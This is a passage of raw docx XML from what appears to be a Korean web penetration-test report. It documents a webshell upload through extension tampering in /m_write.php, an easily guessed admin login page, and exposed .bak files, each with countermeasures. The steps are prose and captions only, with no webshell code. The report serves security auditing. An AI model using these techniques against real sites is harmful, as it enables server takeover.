        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="491" w:name="_Toc48909071"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="491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114523" w:rsidRPr="0070637F" w:rsidTr="00752E25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114523" w:rsidRPr="0070637F" w:rsidRDefault="00114523" w:rsidP="00752E2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114523" w:rsidRPr="0070637F" w:rsidRDefault="00114523" w:rsidP="00752E25">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="0070637F">
              <w:t xml:space="preserve">* </w:t>
            </w:r>
            <w:r w:rsidR="00A04580" w:rsidRPr="00A04580">
              <w:t>/m_write.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00114523" w:rsidRPr="0070637F" w:rsidTr="00752E25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114523" w:rsidRPr="0070637F" w:rsidRDefault="00114523" w:rsidP="00752E2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114523" w:rsidRPr="001532F8" w:rsidRDefault="00114523" w:rsidP="001532F8">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001532F8">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="00A04580" w:rsidRPr="001532F8">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>m_write.php</w:t>
            </w:r>
            <w:r w:rsidR="001532F8" w:rsidRPr="001532F8">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">을 통해 확장자 변조 등을 통해 </w:t>
            </w:r>
            <w:r w:rsidR="001532F8">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>w</w:t>
            </w:r>
            <w:r w:rsidR="001532F8">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>ebshell</w:t>
            </w:r>
            <w:r w:rsidR="001532F8">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> 같</w:t>
            </w:r>
            <w:r w:rsidR="001532F8" w:rsidRPr="001532F8">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>은 위험한 파일 업로드가 가능함</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00114523" w:rsidRPr="0070637F" w:rsidRDefault="00114523" w:rsidP="00114523">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="00114523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114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="0011452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1532F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>webshell2.php파일을 확장자 변조 등을 통해 업로드를 시도</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="0011452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B09E0" wp14:editId="3CB6B336">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>771525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1520825</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1123950" cy="180975"/>
                <wp:effectExtent l="0" t="0" r="19050" b="28575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F4ED7" id="직사각형 51" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:60.75pt;margin-top:119.75pt;width:88.5pt;height:14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" filled="f" strokecolor="red" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4805FA7B" wp14:editId="28670EB0">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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41170" r="43173" b="3268"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860225" cy="306035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523" w:rsidRPr="0070637F" w:rsidRDefault="00114523" w:rsidP="00114523">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="492" w:name="_Toc48909177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25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1532F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>데이터 변조를 이용한 파일 업로드</w:t>
      </w:r>
      <w:bookmarkEnd w:id="492"/>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="00114523">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="0011452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2]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001532F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>webshell2.php</w:t>
      </w:r>
      <w:r w:rsidR="001532F8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001532F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>파일이 업로드 된 것을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="0011452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B2CCA" wp14:editId="05E1F35D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1457325</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>891540</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="800100" cy="180975"/>
                <wp:effectExtent l="0" t="0" r="19050" b="2857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0384" id="직사각형 52" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:114.75pt;margin-top:70.2pt;width:63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" filled="f" strokecolor="red" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4841F02E" wp14:editId="24A7F3CC">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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23" b="50256"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860411" cy="306047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523" w:rsidRPr="0070637F" w:rsidRDefault="00114523" w:rsidP="00114523">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="493" w:name="_Toc48909178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26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1532F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>파일 업로드 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="493"/>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="00114523">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001532F8" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="001532F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b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="001532F8" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="001532F8" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00C55587">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#3</w:t>
      </w:r>
      <w:r w:rsidR="001532F8" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="001532F8" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C55587">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>업로드한 파일의 디렉터리를 찾아서 webshell</w:t>
      </w:r>
      <w:r w:rsidR="00C55587">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C55587">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>실행 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001532F8" w:rsidRPr="00C97C1E" w:rsidRDefault="001532F8" w:rsidP="001532F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0DA322D3" wp14:editId="467BBF9C">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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4" b="44438"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860225" cy="306035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2F8" w:rsidRPr="0070637F" w:rsidRDefault="001532F8" w:rsidP="001532F8">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="494" w:name="_Toc48909179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27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>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>webshell 실행</w:t>
      </w:r>
      <w:bookmarkEnd w:id="494"/>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="00114523">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRPr="00C97C1E" w:rsidRDefault="00114523" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="495" w:name="_Toc48909072"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="495"/>
    </w:p>
    <w:p w:rsidR="00A04580" w:rsidRDefault="00114523" w:rsidP="00A04580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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00A04580">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A04580">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>업로드 되는 파일에 대한 확장자 검증 및 실행 권한 제거함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04580" w:rsidRDefault="00A04580" w:rsidP="00A04580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꼭 필요한 경우가 아니면 업로드 기능을 구현하지 않음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04580" w:rsidRDefault="00A04580" w:rsidP="00A04580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화이트 리스트 방식으로 허용된 확장자만 업로드 허용</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04580" w:rsidRPr="0070637F" w:rsidRDefault="00A04580" w:rsidP="00A04580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업로드 되는 파일을 디렉터리에 저장할 때 파일명과 확장자를 외부 사용자가 추측할 수 없는 문자열로 변경하여 저장(파일 이름은 DB에 저장)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00114523" w:rsidRDefault="00C55587" w:rsidP="00C55587">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto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C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="00770CB1" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="496" w:name="_Toc48909073"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>관리자 페이지 노출</w:t>
      </w:r>
      <w:bookmarkEnd w:id="496"/>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="00C55587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b"/>
        <w:numPr>
          <w:ilvl w:val="1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497" w:name="_Toc48909074"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="497"/>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRDefault="00C55587" w:rsidP="00C55587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="00770CB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">웹 관리자 페이지 </w:t>
      </w:r>
      <w:r w:rsidR="00770CB1">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00770CB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 유추라기 쉬운 이름(</w:t>
      </w:r>
      <w:r w:rsidR="00770CB1">
        <w:t xml:space="preserve">admin, manager </w:t>
      </w:r>
      <w:r w:rsidR="00770CB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>등)이나 설정 프로그램 설계 오류 등으로 비 인가자가 관리자 메뉴에 접근할 수 있는 상태</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00770CB1" w:rsidRPr="00F82A42" w:rsidRDefault="00770CB1" w:rsidP="00C55587">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹 관리자의 권한이 노출될 경우 홈페이지의 변조뿐만 아니라 취약성 정도에 따라서 웹 서버의 권한까지고 노출될 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="00C55587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498" w:name="_Toc48909075"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="498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C55587" w:rsidRPr="0070637F" w:rsidTr="00C55587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55587" w:rsidRPr="0070637F" w:rsidRDefault="00C55587" w:rsidP="00C5558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C55587" w:rsidRPr="0070637F" w:rsidRDefault="00C55587" w:rsidP="00C55587">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="0070637F">
              <w:t xml:space="preserve">* </w:t>
            </w:r>
            <w:r w:rsidRPr="00A04580">
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="007D4F75">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>admin/</w:t>
            </w:r>
            <w:r w:rsidR="00770CB1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>admin_login.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55587" w:rsidRPr="0070637F" w:rsidTr="00C55587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55587" w:rsidRPr="0070637F" w:rsidRDefault="00C55587" w:rsidP="00C5558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C55587" w:rsidRPr="001532F8" w:rsidRDefault="00C55587" w:rsidP="007D4F75">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001532F8">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="00770CB1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">웹 관리자 페이지 </w:t>
            </w:r>
            <w:r w:rsidR="00770CB1">
              <w:t>URL</w:t>
            </w:r>
            <w:r w:rsidR="00770CB1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>이 유추라기 쉬운 이름임</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C55587" w:rsidRPr="0070637F" w:rsidRDefault="00C55587" w:rsidP="00C55587">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D4F75" w:rsidRDefault="00C55587" w:rsidP="007D4F75">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="80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770CB1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>관리자 로그인 페이지에 비 인가자가 쉽게 접근 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="00C55587" w:rsidP="007D4F75">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLineChars="425" w:firstLine="850"/>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DF1A46A" wp14:editId="0A3D3274">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="2667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1" r="38537" b="49992"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860401" cy="306047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587" w:rsidRDefault="00C55587" w:rsidP="007D4F75">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="499" w:name="_Toc48909180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28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770CB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>관리자 로그인 페이지 접근</w:t>
      </w:r>
      <w:bookmarkEnd w:id="499"/>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="00770CB1" w:rsidP="00C55587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C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="00C55587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500" w:name="_Toc48909076"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="500"/>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRDefault="00C55587" w:rsidP="00C55587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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00770CB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>유추하기 어려운 이름(포트 번호 변경 포함)으로 관리자 페이지를 변경하여 쉽게 추측하여 관리자 페이지에 접근할 수 없도록 함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00770CB1" w:rsidRDefault="00770CB1" w:rsidP="00C55587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지정된 </w:t>
      </w:r>
      <w:r>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>만 관리자 페이지에 접근 가능하도록 제한함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00770CB1" w:rsidRPr="0070637F" w:rsidRDefault="00770CB1" w:rsidP="00C55587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부득이하게 관리자 페이지를 외부에 노출을 해야 하는 경우 관리자 페이지 로그인시 </w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>차 인증(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">otp, vpn, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인증서 등)을 해야만 로그인이 가능하도록 적용시킴</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4F75" w:rsidRDefault="007D4F75" w:rsidP="00770CB1">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="001E5591" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="501" w:name="_Toc48909077"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>위치 공개</w:t>
      </w:r>
      <w:bookmarkEnd w:id="501"/>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="00C55587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b"/>
        <w:numPr>
          <w:ilvl w:val="1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502" w:name="_Toc48909078"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="502"/>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="0070637F" w:rsidRDefault="00C55587" w:rsidP="00C55587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="001E5591">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>폴더나 파일명의 위치가 예측 가능하고 쉽게 노출되어 공격자가 이를 악용하여 대상에 대한 정보를 획득 가능하고 민감한 데이터에 접근 가능한 상태</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="00C55587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503" w:name="_Toc48909079"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="503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C55587" w:rsidRPr="0070637F" w:rsidTr="00C55587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55587" w:rsidRPr="0070637F" w:rsidRDefault="00C55587" w:rsidP="00C5558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C55587" w:rsidRDefault="00C55587" w:rsidP="00C55587">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="0070637F">
              <w:t xml:space="preserve">* </w:t>
            </w:r>
            <w:r w:rsidRPr="00A04580">
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="001E5591">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>admini/admini_header.php.bak</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E5591" w:rsidRPr="0070637F" w:rsidRDefault="001E5591" w:rsidP="00C55587">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r>
              <w:t>* /</w:t>
            </w:r>
            <w:r w:rsidRPr="001E5591">
              <w:t>session.bak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55587" w:rsidRPr="0070637F" w:rsidTr="00C55587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55587" w:rsidRPr="0070637F" w:rsidRDefault="00C55587" w:rsidP="00C5558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C55587" w:rsidRPr="001532F8" w:rsidRDefault="00C55587" w:rsidP="001E5591">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001532F8">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="001E5591">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>예측 가능한 파일명을 통해 정보가 노출됨</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001E5591" w:rsidRDefault="001E5591" w:rsidP="00C55587">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="001E5591" w:rsidP="00C55587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C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="00C55587" w:rsidP="00C5558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>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
